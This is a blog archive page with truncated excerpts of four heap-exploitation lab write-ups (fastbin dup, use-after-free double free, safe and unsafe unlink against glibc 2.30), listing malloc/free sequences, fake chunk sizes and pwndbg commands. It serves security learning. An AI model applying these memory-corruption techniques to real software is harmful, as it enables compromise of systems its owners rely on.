ivanmedina's blog

Archives · 2016

pwn · heap · uaf · libc-2.30

Challenge Fastbin-Dup

Attacking fastbin and avoiding the 0x70 protection. First fastbin: 1.- Write fake size malloc(24,p64(0x61)) 2.- Write fake size in main arena malloc(24,'C'*48) malloc(24,'D'*48) Second fastbin, to link the fake chunk into the fastbins list: 3.- Fastbin chunk_J=malloc(0X58,'C'*48) chunk_K=malloc(0x58,'D'*48) free(chunk_J) free(chunk_K) fr..

pwn · heap · uaf · bypass

Fastbin with Use-After-Free

1.- Request two 0x50 size chunks: chunk_A = malloc(24, b"A"*24) chunk_B = malloc(24, b"B"*24) 2.- Free chunk A: free(chunk_A) 3.- Free chunk B: free(chunk_B) 4.- Free chunk A: free(chunk_A) 5.- malloc(24,b'C'*24): malloc(24,b'C'*24) 6.- There are the CCCCCCC… where the 7020 pointer was before :O, so ..

pwn · heap · libc-2.30 · unlink

Safe Unlink

Checksec. Tips: Avoid using the 'vis' command when the heap is corrupted. Some commands: pwndbg> p *((struct malloc_chunk*)0x603010).fd pwndbg> dq mp_.sbrk_base pwndbg> p __free_hook pwndbg> ds m_array[0].user_data Reflected write: 1. Prepare chunks 2. Bypass protections: corrupted size vs. prev_size fd = 0xdeadbeef bk = 0xcafebabe prev_size = 0x90 f..

pwn · heap · unlink

Unsafe Unlink

Notes: Chunks are considered "small" when their size is less than 0x400. Remember that an easy way to request a chunk of a specific size is to subtract eight from the size you want. Analyzing the binary: pwndbg> r Starting program: /home/user-pwn18/Escritorio/PWN/HeapLAB/unsafe_unlink/unsafe_unlink ERROR: Could not find ELF base! ============..
